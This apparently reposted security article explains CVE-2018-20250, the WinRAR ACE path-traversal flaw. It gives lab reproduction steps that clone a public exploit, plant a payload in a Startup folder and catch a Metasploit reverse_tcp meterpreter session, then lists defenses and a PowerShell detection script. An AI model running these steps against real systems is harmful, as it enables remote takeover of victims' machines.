2025-01-18 Update From: SLTechnology News&Howtos > Network Security
Shulou (Shulou.com) 06/01 Report
The flaw is caused by UNACEV2.dll, an obsolete dynamic link library used by WinRAR. It was compiled in 2006 without any of the basic protection mechanisms (ASLR, DEP, etc.). The library's purpose is to handle archives in ACE format, and its decompression routine contains a directory traversal vulnerability: a crafted archive can make the decompression process write a file into a startup location (a boot/startup entry), so the file runs and code execution follows.
Vulnerability number: CVE-2018-20250
Affected versions:
- WinRAR < 5.70 Beta 1
- Bandizip <= 6.2.0.0
- 好压 (2345压缩) <= 5.9.8.10907
- 360压缩 <= 4.0.0.1170
Reproduction environment
Exp download:
https://github.com/WyAtu/CVE-2018-20250/
Reproduction steps
1. Use Metasploit to generate Payload
2. Use the exp to generate the malicious archive
cd /root/Desktop
git clone https://github.com/WyAtu/CVE-2018-20250.git
cd CVE-2018-20250
cp /root/WinRAR.exe ./
vim exp.py
In exp.py, change evil_filename = "calc.exe" to evil_filename = "WinRAR.exe"
Copy the CVE-2018-20250 folder to the Windows 10 machine and execute it there
3. Run a malicious program on the target
Copy test.rar to the Win8 target, decompress it and run.
4. Start the Metasploit listener on Kali
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.112.140
msf exploit(handler) > set lport 44444
msf exploit(handler) > run
5. Control target machine
After the Win8 machine restarts, Kali receives the session; run shell at this point.
System-level access to the Win8 system is obtained.
Vulnerability defense
1. Deleting the UNACEV2.dll file from the affected archiver's installation directory is an effective defense (it removes ACE support, which is the only thing that library provides).
2. Upgrade to the latest version; at the time of writing the current WinRAR version is 5.70 Beta 1.
3. All in all, the vulnerability is not that deadly. To hit a target, the attacker first has to trick the victim into downloading the archive and then decompressing it on an unprotected server, which is difficult to pull off against enterprise server administrators. The server must also be restarted for the payload to take effect; the script cannot be executed directly.
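As an added defensive check (not part of the original post or the exploit repository), the following PowerShell script reports whether the obsolete UNACEV2.dll is still present under common archiver install directories, prints the WinRAR.exe file version, and lists executable-type entries in the per-user and all-users Startup folders, which is where the traversal write described above lands. The install paths are assumptions; adjust them for the archivers deployed on your hosts.

```powershell
# Added defensive check (not from the original post). Install paths below are
# assumptions; extend the list for 好压/360压缩 or other archivers you deploy.
$archiverDirs = @(
    "$env:ProgramFiles\WinRAR",
    "${env:ProgramFiles(x86)}\WinRAR",
    "$env:ProgramFiles\Bandizip",
    "${env:ProgramFiles(x86)}\Bandizip"
)

foreach ($dir in $archiverDirs) {
    if (-not (Test-Path $dir)) { continue }
    # Search recursively: some archivers keep format plugins in a sub-folder.
    $dll = Get-ChildItem -Path $dir -Filter 'UNACEV2.dll' -Recurse -ErrorAction SilentlyContinue
    if ($dll) {
        foreach ($f in $dll) {
            Write-Warning "Vulnerable ACE handler present: $($f.FullName) (modified $($f.LastWriteTime))"
        }
    } else {
        Write-Output "OK: no UNACEV2.dll under $dir"
    }
    # WinRAR 5.70 Beta 1 and later no longer ship the DLL; report the installed version.
    $rar = Join-Path $dir 'WinRAR.exe'
    if (Test-Path $rar) {
        $ver = (Get-Item $rar).VersionInfo.FileVersion
        Write-Output "WinRAR.exe file version: $ver"
    }
}

# The dropped payload runs from a Startup folder at the next logon/restart,
# so list anything executable that sits there and when it was created.
$startupDirs = @(
    [Environment]::GetFolderPath('Startup'),
    [Environment]::GetFolderPath('CommonStartup')
)
foreach ($s in $startupDirs) {
    Get-ChildItem -Path $s -File -ErrorAction SilentlyContinue |
        Where-Object { $_.Extension -in '.exe', '.bat', '.cmd', '.vbs', '.js', '.lnk' } |
        ForEach-Object {
            Write-Warning "Startup entry: $($_.FullName) (created $($_.CreationTime))"
        }
}
```

Run it from an elevated prompt so Program Files and the all-users Startup folder are readable; a warning line for UNACEV2.dll means step 1 or 2 above still needs to be applied on that host.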